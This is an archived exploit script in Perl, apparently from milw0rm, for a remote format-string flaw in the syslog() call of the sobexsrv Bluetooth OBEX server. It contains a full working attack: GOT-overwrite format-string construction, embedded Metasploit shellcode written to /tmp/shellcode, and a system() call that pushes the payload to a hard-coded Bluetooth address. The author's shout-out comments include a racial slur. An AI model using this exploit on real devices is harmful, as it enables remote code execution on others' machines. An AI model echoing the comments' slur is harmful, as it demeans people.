sobexsrv 1.0.0_pre3 Bluetooth - 'syslog()' Remote Format String

#!/usr/bin/perl
# 
# trifinite.group Bluetooth sobexsrv remote syslog() exploit
# code by kf_lists[at]digitalmunition[dot]com
#
# http://www.digitalmunition.com
#
# Shouts to my nigga Chung and the Donut Shop... keep fighting that SARS dude!
# Big ups to d4yj4y beeeeeeeeeeeeeotch! 
#
$retloc = 0x8053418;   # Due to unicode the filename is NOT usable. Must use file contents. 

# R_386_JUMP_SLOT exit()
$addy  = "\x5a\x19\x05\x08";
$addy2 = "\x58\x19\x05\x08";

$lo = ($retloc >> 0) & 0xffff;
$hi = ($retloc >> 16) & 0xffff;

$hi = $hi - 0x38;
$lo = (0x10000 + $lo) - $hi - 0x38;

#print "hi: $hi\n";
#print "lo: $lo\n";

$string = "./ussp-push 00:0B:0D:63:0B:CC\@1 /tmp/shellcode " . "$addy$addy2%$hi.d%27\\\$hn%$lo.d%28\\\$hn" . "\x41" x 200;
#print $string . "\n";

$sc = "\x90" x 31 . # Metasploit /usr/bin/id shellcode 
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4c\x46\x4b\x50\x4a\x35".
"\x49\x39\x44\x55\x48\x46\x4a\x46\x4d\x52\x43\x36\x49\x58\x47\x4e".
"\x4a\x56\x4f\x52\x43\x57\x4a\x46\x42\x50\x4a\x56\x4f\x32\x44\x56".
"\x49\x46\x50\x56\x49\x58\x43\x4e\x44\x45\x4a\x4e\x4e\x30\x42\x30".
"\x42\x30\x42\x50\x4f\x32\x45\x47\x43\x57\x44\x47\x4f\x32\x44\x56".
"\x49\x36\x50\x46\x4f\x52\x49\x56\x46\x36\x42\x50\x47\x45\x43\x35".
"\x49\x58\x41\x4e\x4d\x4c\x42\x38\x5a";

open(F, "> /tmp/shellcode") or die "can't open file";
print F "$sc\n";
close(F);

system($string);

# milw0rm.com [2005-12-03]